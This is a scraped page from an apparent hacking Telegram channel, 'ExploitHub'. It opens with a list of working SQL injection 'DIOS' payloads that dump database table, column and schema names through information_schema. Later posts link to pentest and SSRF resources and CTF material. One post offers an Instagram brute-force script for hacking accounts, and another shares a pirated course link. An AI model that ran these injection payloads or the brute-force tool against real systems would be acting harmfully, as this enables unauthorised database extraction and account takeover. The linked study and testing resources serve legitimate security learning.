ExploitHub
@exploithub
6.35K subscribers
18 photos
1 video
15 files
348 links
Download Telegram
About
Blog
Apps
Platform
Join
ExploitHub
6.35K subscribers
ExploitHub
columns:
concat( (select (@x) from (select (@x:=0),(@CLMcount:=0), (select (0) from information_Schema.columns where table_schema=database()and (0x00) in (@x:=concat(@x,if(column_name,0x00,0x00),if(@CLMcount:=@CLMcount%2b1,0x0,0x0) ))))x), 'Columns Count is : ',@CLMcount)
==========================================
10. Sort tables Ascending order as per record
==========================================
a. with "COALESCE" Function
=================
concat%280x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,%28SELECT+GROUP_CONCAT%28table_name,0x203a3a20,COALESCE%28table_rows,0%29+order+by+COALESCE%28table_rows,0%29+ASC+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%29
======
b. with "IFNULL" function
======
concat(0x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,(SELECT+GROUP_CONCAT(table_name,0x203a3a20,ifnull(table_rows,0)+order+by+ifnull(table_rows,0)+ASC+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()))
========
c. with declaring variable methods
=========
concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
===========================================
11. Sort tables Desc order as per record
============================================
concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
===========================================
12. The Smallest and Simplest DIOS Ever ;)
===========================================
concat(@:=0,(select count(*)from information_schema.columns where@:=concat(@,'<p>',table_name,':',column_name)),@)
============================================
13. TWIN Injection DIOS
============================================
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)
===========================================
@exploithub
3.03K views
ExploitHub
https://github.com/jdonsec/AllThingsSSRF
GitHub
GitHub - jdonsec/AllThingsSSRF: This is a collection of writeups, cheatsheets, videos, books related to SSRF in one single location
This is a collection of writeups, cheatsheets, videos, books related to SSRF in one single location - jdonsec/AllThingsSSRF
3.13K views
ExploitHub
https://github.com/geeksonsecurity/vuln-web-apps
GitHub
GitHub - geeksonsecurity/vuln-web-apps: A curated list of vulnerable web applications.
A curated list of vulnerable web applications. Contribute to geeksonsecurity/vuln-web-apps development by creating an account on GitHub.
3.26K views
ExploitHub
Forwarded from Mr.hEx
This all elearnsecurity course
762 views
ExploitHub
Instagram-master.zip
15.2 KB
Instagram Brute Force Script Advanced
Hack Instagram accounts :)
@exploithub
4.29K viewsedited  
ExploitHub
https://medium.com/@hackerb0y/rest-framework-admin-panel-bypass-and-how-i-recon-for-this-vulnerability-a0ee41b01102
Medium
REST framework Admin Panel bypass and how I recon for this vulnerability
Hi, This is Aziz Hakim a.k.a hackerb0y
3.36K views
ExploitHub
Forwarded from Naveen
Penta is is Pentest automation tool using Python3.
(Future!) It provides advanced features such as metasploit (https://www.kitploit.com/search/label/Metasploit) and nexpose to extract vuln info found on specific servers.
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
5.34K views
ExploitHub
https://www.mohamedharon.com/2019/06/can-i-takeover-xyz-steps.html
3.36K views
ExploitHub
ExploitHub pinned Deleted message
ExploitHub
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
GitHub
GitHub - blaCCkHatHacEEkr/PENTESTING-BIBLE: articles
articles. Contribute to blaCCkHatHacEEkr/PENTESTING-BIBLE development by creating an account on GitHub.
4.31K views
ExploitHub
http://www.securityidiots.com/Web-Pentest
Securityidiots
Posts Related to Web-Pentest
Find Posts Related to Web-Pentest and more.
3.79K views
ExploitHub
https://github.com/OWASP/owasp-mstg
GitHub
GitHub - OWASP/mastg: The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security…
The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the OWA...
3.91K views
ExploitHub
https://realpython.com/python38-new-features
@exploithub
Realpython
Python 3.8: Cool New Features for You to Try – Real Python
What does Python 3.8 bring to the table? Learn about some of the biggest changes and see you how you can best make use of them.
3.33K viewsedited  
ExploitHub
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
GitHub
GitHub - tanprathan/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection…
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - tanprathan/MobileApp-Pentest-Chea...
3.58K views
ExploitHub
#Wayback sqliScanner
https://github.com/ghostlulzhacks/waybackSqliScanner
GitHub
GitHub - ghostlulzhacks/waybackSqliScanner
Contribute to ghostlulzhacks/waybackSqliScanner development by creating an account on GitHub.
3.6K views
ExploitHub
Offensive Security - Advanced Web Attacks and Exploitation [2016]
https://pastebin.com/QUMiKbfT
4.13K viewsedited  
ExploitHub
If link is not work after posting, I am not responsible. Be active & copy at the moment of course.
3.38K views
ExploitHub
https://github.com/notpike/SDR-Notes/blob/master/README.md
GitHub
SDR-Notes/README.md at master · notpike/SDR-Notes
Notes and resorce's for SDR/Wireless tech. Contribute to notpike/SDR-Notes development by creating an account on GitHub.
3.72K views
ExploitHub
https://github.com/kablaa/CTF-Workshop
GitHub
GitHub - kablaa/CTF-Workshop: Challenges for Binary Exploitation Workshop
Challenges for Binary Exploitation Workshop. Contribute to kablaa/CTF-Workshop development by creating an account on GitHub.
4.06K views
ExploitHub
I dont know who is this guy. But I was verymuch inspired by this guy's hardwork. From bugbounty hunter to OSCP. Balancing professional life & praticing the labs parallely. Work balance & Time management explained clearly. Must read https://kishanchoudhary.com/OSCP/journey.html
Kishan choudhary
Bug-bounty to OSCP Journey
Hello im kishan choudhary! this is my new blog
4.1K views